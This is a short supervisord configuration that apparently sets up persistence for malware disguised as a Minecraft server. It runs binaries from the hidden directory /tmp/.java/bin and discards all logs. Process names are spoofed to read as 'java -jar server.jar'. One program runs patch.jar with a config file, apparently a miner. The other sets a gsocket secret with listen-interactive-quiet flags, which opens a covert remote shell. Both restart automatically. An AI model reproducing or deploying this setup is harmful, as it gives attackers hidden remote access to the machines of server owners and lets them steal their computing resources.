[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./paper.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -Xms1024M -jar server.jar' ./patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s iA3eD2K9c-4D9g8H6b5j756C4-a9f6X1eCd9F9440-d6A28039A1c5J1g6K -liq"
command=./paper.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -Xms1024M -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true